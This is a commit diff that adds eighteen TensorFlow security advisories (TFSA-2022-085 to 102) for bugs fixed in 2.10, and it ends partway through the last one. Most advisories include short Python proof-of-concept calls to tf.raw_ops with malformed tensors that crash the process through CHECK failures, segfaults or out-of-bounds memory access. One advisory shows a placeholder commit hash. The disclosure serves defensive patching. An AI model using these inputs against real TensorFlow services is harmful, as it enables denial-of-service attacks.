Add TF Security Advisories for vulnerability reports fixed for the TF 2.10 release.
PiperOrigin-RevId: 468546554
diff --git a/tensorflow/security/advisory/tfsa-2022-085.md b/tensorflow/security/advisory/tfsa-2022-085.md
new file mode 100644
index 0000000..66b8560
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-085.md
@@ -0,0 +1,24 @@
+## TFSA-2022-085: `CHECK` failure in tf.reshape via overflows
+
+### CVE Number
+CVE-2022-35934
+
+### Impact
+The implementation of tf.reshape op in TensorFlow is vulnerable to a denial of service via CHECK-failure (assertion failure) caused by overflowing the number of elements in a tensor:
+```python
+import tensorflow as tf
+
+tf.reshape(tensor=[[1]],shape=tf.constant([0 for i in range(255)], dtype=tf.int64))
+```
+This is another instance of [TFSA-2021-198](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-198.md) ([GHSA-prcg-wp5q-rv7p](https://github.com/advisories/GHSA-prcg-wp5q-rv7p)).
+
+### Patches
+We have patched the issue in GitHub commit [61f0f9b94df8c0411f0ad0ecc2fec2d3f3c33555](https://github.com/tensorflow/tensorflow/commit/61f0f9b94df8c0411f0ad0ecc2fec2d3f3c33555).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by Kang Hong Jin from Singapore Management University.
diff --git a/tensorflow/security/advisory/tfsa-2022-086.md b/tensorflow/security/advisory/tfsa-2022-086.md
new file mode 100644
index 0000000..db2c8ee
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-086.md
@@ -0,0 +1,28 @@
+## TFSA-2022-086: `CHECK` failure in `SobolSample` via missing validation
+
+### CVE Number
+CVE-2022-35935
+
+### Impact
+The implementation of SobolSampleOp is vulnerable to a denial of service via CHECK-failure (assertion failure) caused by assuming `input(0)`, `input(1)`, and `input(2)` to be scalar.
+```python
+import tensorflow as tf
+tf.raw_ops.SobolSample(dim=tf.constant([1,0]), num_results=tf.constant([1]), skip=tf.constant([1]))
+```
+
+### Patches
+We have patched the issue in GitHub commit [c65c67f88ad770662e8f191269a907bf2b94b1bf](https://github.com/tensorflow/tensorflow/commit/c65c67f88ad770662e8f191269a907bf2b94b1bf).
+
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by:
+- Kang Hong Jin from Singapore Management University
+- Neophytos Christou, Secure Systems Labs, Brown University
+- 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology
diff --git a/tensorflow/security/advisory/tfsa-2022-087.md b/tensorflow/security/advisory/tfsa-2022-087.md
new file mode 100644
index 0000000..3ddac71
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-087.md
@@ -0,0 +1,21 @@
+## TFSA-2022-087: OOB read in `Gather_nd` op in TF Lite
+
+### CVE Number
+CVE-2022-35937
+
+### Impact
+The [`GatherNd`](https://github.com/tensorflow/tensorflow/blob/f463040eb3997e42e60a2ffc6dc72de7ef11dbb4/tensorflow/lite/kernels/gather_nd.cc#L105-L111) function takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read is triggered.
+
+### Patches
+We have patched the issue in GitHub commit [595a65a3e224a0362d7e68c2213acfc2b499a196](https://github.com/tensorflow/tensorflow/commit/595a65a3e224a0362d7e68c2213acfc2b499a196).
+
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Hui Peng from Baidu Security.
diff --git a/tensorflow/security/advisory/tfsa-2022-088.md b/tensorflow/security/advisory/tfsa-2022-088.md
new file mode 100644
index 0000000..da39da4
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-088.md
@@ -0,0 +1,26 @@
+## TFSA-2022-088: `CHECK` failure in `TensorListReserve` via missing validation
+
+### CVE Number
+CVE-2022-35960
+
+### Impact
+In [`core/kernels/list_kernels.cc's TensorListReserve`](https://github.com/tensorflow/tensorflow/blob/c8ba76d48567aed347508e0552a257641931024d/tensorflow/core/kernels/list_kernels.cc#L322-L325), `num_elements` is assumed to be a tensor of size 1. When a `num_elements` of more than 1 element is provided, then `tf.raw_ops.TensorListReserve` fails the `CHECK_EQ` in `CheckIsAlignedAndSingleElement`.
+```python
+import tensorflow as tf
+
+tf.raw_ops.TensorListReserve(element_shape=(1,1), num_elements=tf.constant([1,1], dtype=tf.int32), element_dtype=tf.int8)
+```
+
+### Patches
+We have patched the issue in GitHub commit [xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx](https://github.com/tensorflow/tensorflow/commit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx).
+
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Kang Hong Jin from Singapore Management University.
diff --git a/tensorflow/security/advisory/tfsa-2022-089.md b/tensorflow/security/advisory/tfsa-2022-089.md
new file mode 100644
index 0000000..bd05225
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-089.md
@@ -0,0 +1,20 @@
+## TFSA-2022-089: OOB write in `Scatter_nd` op in TF Lite
+
+### CVE Number
+CVE-2022-35939
+
+### Impact
+The [`ScatterNd`](https://github.com/tensorflow/tensorflow/blob/266558ac4c1f361e9a178ee9d3f0ce2e648ae499/tensorflow/lite/kernels/internal/reference/reference_ops.h#L659-L698) function takes an input argument that determines the indices of of the output tensor. An input index greater than the output tensor or less than zero will either write content at the wrong index or trigger a crash.
+
+### Patches
+We have patched the issue in GitHub commit [b4d4b4cb019bd7240a52daa4ba61e3cc814f0384](https://github.com/tensorflow/tensorflow/commit/b4d4b4cb019bd7240a52daa4ba61e3cc814f0384).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Hui Peng from Baidu Security.
diff --git a/tensorflow/security/advisory/tfsa-2022-090.md b/tensorflow/security/advisory/tfsa-2022-090.md
new file mode 100644
index 0000000..a7ebb12
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-090.md
@@ -0,0 +1,24 @@
+## TFSA-2022-090: Int overflow in `RaggedRangeOp`
+
+### CVE Number
+CVE-2022-35940
+
+### Impact
+The [`RaggedRangOp`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/kernels/ragged_range_op.cc#L74-L88) function takes an argument `limits` that is eventually used to construct a `TensorShape` as an `int64`. If `limits` is a very large float, it can overflow when converted to an `int64`. This triggers an `InvalidArgument` but also throws an abort signal that crashes the program.
+```python
+import tensorflow as tf
+tf.raw_ops.RaggedRange(starts=[1.1,0.1],limits=[10.0,1e20],deltas=[1,1])
+```
+
+### Patches
+We have patched the issue in GitHub commit [37cefa91bee4eace55715eeef43720b958a01192](https://github.com/tensorflow/tensorflow/commit/37cefa91bee4eace55715eeef43720b958a01192).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Jingyi Shi.
diff --git a/tensorflow/security/advisory/tfsa-2022-091.md b/tensorflow/security/advisory/tfsa-2022-091.md
new file mode 100644
index 0000000..4fbd1a0
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-091.md
@@ -0,0 +1,32 @@
+## TFSA-2022-091: `CHECK` failure in `AvgPoolOp`
+
+### CVE Number
+CVE-2022-35941
+
+### Impact
+The [`AvgPoolOp`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/avgpooling_op.cc#L56-L98) function takes an argument `ksize` that must be positive but is not checked. A negative `ksize` can trigger a `CHECK` failure and crash the program.
+```python
+import tensorflow as tf
+import numpy as np
+
+value = np.ones([1, 1, 1, 1])
+ksize = [1, 1e20, 1, 1]
+strides = [1, 1, 1, 1]
+padding = 'SAME'
+data_format = 'NHWC'
+
+tf.raw_ops.AvgPool(value=value, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
+```
+
+### Patches
+We have patched the issue in GitHub commit [3a6ac52664c6c095aa2b114e742b0aa17fdce78f](https://github.com/tensorflow/tensorflow/commit/3a6ac52664c6c095aa2b114e742b0aa17fdce78f).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Jingyi Shi.
diff --git a/tensorflow/security/advisory/tfsa-2022-092.md b/tensorflow/security/advisory/tfsa-2022-092.md
new file mode 100644
index 0000000..82f8cf6
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-092.md
@@ -0,0 +1,35 @@
+## TFSA-2022-092: `CHECK` failures in `UnbatchGradOp`
+
+### CVE Number
+CVE-2022-35952
+
+### Impact
+The [`UnbatchGradOp`](https://github.com/tensorflow/tensorflow/blob/769eddaf479c8debead9a59a72617d6ed6f0fe10/tensorflow/core/kernels/batch_kernels.cc#L891) function takes an argument `id` that is assumed to be a scalar. A nonscalar `id` can trigger a `CHECK` failure and crash the program.
+```python
+import numpy as np
+import tensorflow as tf
+
+# `id` is not scalar
+tf.raw_ops.UnbatchGrad(original_input= tf.constant([1]),batch_index=tf.constant([[0,0,0 ], ], dtype=tf.int64),grad=tf.constant([1,]),id=tf.constant([1,1,], dtype=tf.int64))
+```
+It also requires its argument `batch_index` to contain three times the number of elements as indicated in its `batch_index.dim_size(0)`. An incorrect `batch_index` can trigger a `CHECK` failure and crash the program.
+```python
+import numpy as np
+import tensorflow as tf
+
+# batch_index's size is not 3
+tf.raw_ops.UnbatchGrad(original_input= tf.constant([1]),batch_index=tf.constant([[0,0], ], dtype=tf.int64),grad=tf.constant([1,]),id=tf.constant([1,], dtype=tf.int64))
+```
+
+### Patches
+We have patched the issue in GitHub commit [5f945fc6409a3c1e90d6970c9292f805f6e6ddf2](https://github.com/tensorflow/tensorflow/commit/5f945fc6409a3c1e90d6970c9292f805f6e6ddf2).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Kang Hong Jin from Singapore Management University and 刘力源 from the Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology
diff --git a/tensorflow/security/advisory/tfsa-2022-093.md b/tensorflow/security/advisory/tfsa-2022-093.md
new file mode 100644
index 0000000..255c66c
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-093.md
@@ -0,0 +1,49 @@
+## TFSA-2022-093: Segfault TFLite converter on per-channel quantized transposed convolutions
+
+### CVE Number
+CVE-2022-36027
+
+### Impact
+When converting transposed convolutions using per-channel weight quantization the converter segfaults and crashes the Python process.
+```python
+import tensorflow as tf
+
+class QuantConv2DTransposed(tf.keras.layers.Layer):
+ def build(self, input_shape):
+ self.kernel = self.add_weight("kernel", [3, 3, input_shape[-1], 24])
+
+ def call(self, inputs):
+ filters = tf.quantization.fake_quant_with_min_max_vars_per_channel(
+ self.kernel, -3.0 * tf.ones([24]), 3.0 * tf.ones([24]), narrow_range=True
+ )
+ filters = tf.transpose(filters, (0, 1, 3, 2))
+ return tf.nn.conv2d_transpose(inputs, filters, [*inputs.shape[:-1], 24], 1)
+
+
+inp = tf.keras.Input(shape=(6, 8, 48), batch_size=1)
+x = tf.quantization.fake_quant_with_min_max_vars(inp, -3.0, 3.0, narrow_range=True)
+x = QuantConv2DTransposed()(x)
+x = tf.quantization.fake_quant_with_min_max_vars(x, -3.0, 3.0, narrow_range=True)
+
+model = tf.keras.Model(inp, x)
+
+model.save("/tmp/testing")
+converter = tf.lite.TFLiteConverter.from_saved_model("/tmp/testing")
+converter.optimizations = [tf.lite.Optimize.DEFAULT]
+
+# terminated by signal SIGSEGV (Address boundary error)
+tflite_model = converter.convert()
+```
+
+### Patches
+We have patched the issue in GitHub commit [aa0b852a4588cea4d36b74feb05d93055540b450](https://github.com/tensorflow/tensorflow/commit/aa0b852a4588cea4d36b74feb05d93055540b450).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Lukas Geiger via [Github issue](https://github.com/tensorflow/tensorflow/issues/53767).
diff --git a/tensorflow/security/advisory/tfsa-2022-094.md b/tensorflow/security/advisory/tfsa-2022-094.md
new file mode 100644
index 0000000..7c6b807
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-094.md
@@ -0,0 +1,31 @@
+## TFSA-2022-094: `CHECK` failures in `AvgPool3DGrad`
+
+### CVE Number
+CVE-2022-35959
+
+### Impact
+The implementation of `AvgPool3DGradOp` does not fully validate the input `orig_input_shape`. This results in an overflow that results in a `CHECK` failure which can be used to trigger a denial of service attack:
+```python
+import tensorflow as tf
+
+ksize = [1, 2, 2, 1]
+strides = [1, 2, 2, 1]
+padding = "VALID"
+data_format = "NHWC"
+orig_input_shape = tf.constant(-536870912, shape=[4], dtype=tf.int32)
+grad = tf.constant(.0890338004362538, shape=[1,5,7,1], dtype=tf.float64)
+tf.raw_ops.AvgPoolGrad(orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
+```
+
+### Patches
+We have patched the issue in GitHub commit [9178ac9d6389bdc54638ab913ea0e419234d14eb](https://github.com/tensorflow/tensorflow/commit/9178ac9d6389bdc54638ab913ea0e419234d14eb).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-095.md b/tensorflow/security/advisory/tfsa-2022-095.md
new file mode 100644
index 0000000..22373a6
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-095.md
@@ -0,0 +1,30 @@
+## TFSA-2022-095: `CHECK` failures in `FractionalAvgPoolGrad`
+
+### CVE Number
+CVE-2022-35963
+
+### Impact
+The implementation of `FractionalAvgPoolGrad` does not fully validate the input `orig_input_tensor_shape`. This results in an overflow that results in a `CHECK` failure which can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+overlapping = True
+orig_input_tensor_shape = tf.constant(-1879048192, shape=[4], dtype=tf.int64)
+out_backprop = tf.constant([], shape=[0,0,0,0], dtype=tf.float64)
+row_pooling_sequence = tf.constant(1, shape=[4], dtype=tf.int64)
+col_pooling_sequence = tf.constant(1, shape=[4], dtype=tf.int64)
+tf.raw_ops.FractionalAvgPoolGrad(orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=overlapping)
+```
+
+### Patches
+We have patched the issue in GitHub commit [03a659d7be9a1154fdf5eeac221e5950fec07dad](https://github.com/tensorflow/tensorflow/commit/03a659d7be9a1154fdf5eeac221e5950fec07dad).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-096.md b/tensorflow/security/advisory/tfsa-2022-096.md
new file mode 100644
index 0000000..8903bb2
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-096.md
@@ -0,0 +1,48 @@
+## TFSA-2022-096: Segfault in `BlockLSTMGradV2`
+
+### CVE Number
+CVE-2022-35964
+
+### Impact
+The implementation of `BlockLSTMGradV2` does not fully validate its inputs.
+ - `wci`, `wcf`, `wco`, `b` must be rank 1
+ - `w`, cs_prev`, `h_prev` must be rank 2
+ - `x` must be rank 3
+This results in a a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+use_peephole = False
+seq_len_max = tf.constant(1, shape=[], dtype=tf.int64)
+x = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+cs_prev = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+h_prev = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+w = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+wci = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+wcf = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+wco = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+b = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+i = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+cs = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+f = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+o = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+ci = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+co = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+h = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+cs_grad = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+h_grad = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32)
+tf.raw_ops.BlockLSTMGradV2(seq_len_max=seq_len_max, x=x, cs_prev=cs_prev, h_prev=h_prev, w=w, wci=wci, wcf=wcf, wco=wco, b=b, i=i, cs=cs, f=f, o=o, ci=ci, co=co, h=h, cs_grad=cs_grad, h_grad=h_grad, use_peephole=use_peephole)
+```
+
+### Patches
+We have patched the issue in GitHub commit [2a458fc4866505be27c62f81474ecb2b870498fa](https://github.com/tensorflow/tensorflow/commit/2a458fc4866505be27c62f81474ecb2b870498fa).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-097.md b/tensorflow/security/advisory/tfsa-2022-097.md
new file mode 100644
index 0000000..953df35
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-097.md
@@ -0,0 +1,36 @@
+## TFSA-2022-097: Segfault in `LowerBound` and `UpperBound`
+
+### CVE Number
+CVE-2022-35965
+
+### Impact
+If `LowerBound` or `UpperBound` is given an empty`sorted_inputs` input, it results in a `nullptr` dereference, leading to a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+out_type = tf.int32
+sorted_inputs = tf.constant([], shape=[10,0], dtype=tf.float32)
+values = tf.constant([], shape=[10,10,0,10,0], dtype=tf.float32)
+tf.raw_ops.LowerBound(sorted_inputs=sorted_inputs, values=values, out_type=out_type)
+```
+```python
+import tensorflow as tf
+
+out_type = tf.int64
+sorted_inputs = tf.constant([], shape=[2,2,0,0,0,0,0,2], dtype=tf.float32)
+values = tf.constant(0.372660398, shape=[2,4], dtype=tf.float32)
+tf.raw_ops.UpperBound(sorted_inputs=sorted_inputs, values=values, out_type=out_type)
+```
+
+### Patches
+We have patched the issue in GitHub commit [bce3717eaef4f769019fd18e990464ca4a2efeea](https://github.com/tensorflow/tensorflow/commit/bce3717eaef4f769019fd18e990464ca4a2efeea).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-098.md b/tensorflow/security/advisory/tfsa-2022-098.md
new file mode 100644
index 0000000..ac2adf2
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-098.md
@@ -0,0 +1,31 @@
+## TFSA-2022-098: Segfault in `QuantizedAvgPool`
+
+### CVE Number
+CVE-2022-35966
+
+### Impact
+If `QuantizedAvgPool` is given `min_input` or `max_input` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+ksize = [1, 2, 2, 1]
+strides = [1, 2, 2, 1]
+padding = "SAME"
+input = tf.constant(1, shape=[1,4,4,2], dtype=tf.quint8)
+min_input = tf.constant([], shape=[0], dtype=tf.float32)
+max_input = tf.constant(0, shape=[1], dtype=tf.float32)
+tf.raw_ops.QuantizedAvgPool(input=input, min_input=min_input, max_input=max_input, ksize=ksize, strides=strides, padding=padding)
+```
+
+### Patches
+We have patched the issue in GitHub commit [7cdf9d4d2083b739ec81cfdace546b0c99f50622](https://github.com/tensorflow/tensorflow/commit/7cdf9d4d2083b739ec81cfdace546b0c99f50622).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-099.md b/tensorflow/security/advisory/tfsa-2022-099.md
new file mode 100644
index 0000000..1fd9919
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-099.md
@@ -0,0 +1,32 @@
+## TFSA-2022-099: Segfault in `QuantizedAdd`
+
+### CVE Number
+CVE-2022-35967
+
+### Impact
+If `QuantizedAdd` is given `min_input` or `max_input` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+Toutput = tf.qint32
+x = tf.constant(140, shape=[1], dtype=tf.quint8)
+y = tf.constant(26, shape=[10], dtype=tf.quint8)
+min_x = tf.constant([], shape=[0], dtype=tf.float32)
+max_x = tf.constant(0, shape=[], dtype=tf.float32)
+min_y = tf.constant(0, shape=[], dtype=tf.float32)
+max_y = tf.constant(0, shape=[], dtype=tf.float32)
+tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y, Toutput=Toutput)
+```
+
+### Patches
+We have patched the issue in GitHub commit [49b3824d83af706df0ad07e4e677d88659756d89](https://github.com/tensorflow/tensorflow/commit/49b3824d83af706df0ad07e4e677d88659756d89).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-100.md b/tensorflow/security/advisory/tfsa-2022-100.md
new file mode 100644
index 0000000..0ec2bcf
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-100.md
@@ -0,0 +1,31 @@
+## TFSA-2022-100: `CHECK` fail in `AvgPoolGrad`
+
+### CVE Number
+CVE-2022-35968
+
+### Impact
+The implementation of `AvgPoolGrad` does not fully validate the input `orig_input_shape`. This results in a `CHECK` failure which can be used to trigger a denial of service attack:
+```python
+import tensorflow as tf
+
+ksize = [1, 2, 2, 1]
+strides = [1, 2, 2, 1]
+padding = "VALID"
+data_format = "NHWC"
+orig_input_shape = tf.constant(-536870912, shape=[4], dtype=tf.int32)
+grad = tf.constant(.0890338004362538, shape=[1,5,7,1], dtype=tf.float64)
+tf.raw_ops.AvgPoolGrad(orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
+```
+
+### Patches
+We have patched the issue in GitHub commit [3a6ac52664c6c095aa2b114e742b0aa17fdce78f](https://github.com/tensorflow/tensorflow/commit/3a6ac52664c6c095aa2b114e742b0aa17fdce78f).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-101.md b/tensorflow/security/advisory/tfsa-2022-101.md
new file mode 100644
index 0000000..11fd3f6
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-101.md
@@ -0,0 +1,34 @@
+## TFSA-2022-101: `CHECK` fail in `Conv2DBackpropInput`
+
+### CVE Number
+CVE-2022-35969
+
+### Impact
+The implementation of `Conv2DBackpropInput` requires `input_sizes` to be 4-dimensional. Otherwise, it gives a `CHECK` failure which can be used to trigger a denial of service attack:
+```python
+import tensorflow as tf
+
+strides = [1, 1, 1, 1]
+padding = "SAME"
+use_cudnn_on_gpu = True
+explicit_paddings = []
+data_format = "NHWC"
+dilations = [1, 1, 1, 1]
+input_sizes = tf.constant([65534,65534], shape=[2], dtype=tf.int32)
+filter = tf.constant(0.159749106, shape=[3,3,2,2], dtype=tf.float32)
+out_backprop = tf.constant(0, shape=[], dtype=tf.float32)
+tf.raw_ops.Conv2DBackpropInput(input_sizes=input_sizes, filter=filter, out_backprop=out_backprop, strides=strides, padding=padding, use_cudnn_on_gpu=use_cudnn_on_gpu, explicit_paddings=explicit_paddings, data_format=data_format, dilations=dilations)
+```
+
+### Patches
+We have patched the issue in GitHub commit [50156d547b9a1da0144d7babe665cf690305b33c](https://github.com/tensorflow/tensorflow/commit/50156d547b9a1da0144d7babe665cf690305b33c).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
diff --git a/tensorflow/security/advisory/tfsa-2022-102.md b/tensorflow/security/advisory/tfsa-2022-102.md
new file mode 100644
index 0000000..a9a65ee
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-102.md
@@ -0,0 +1,33 @@
+## TFSA-2022-102: Segfault in `QuantizedInstanceNorm`
+
+### CVE Number
+CVE-2022-35970
+
+### Impact
+If `QuantizedInstanceNorm` is given `x_min` or `x_max` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+output_range_given = False
+given_y_min = 0
+given_y_max = 0
+variance_epsilon = 1e-05
+min_separation = 0.001
+x = tf.constant(88, shape=[1,4,4,32], dtype=tf.quint8)
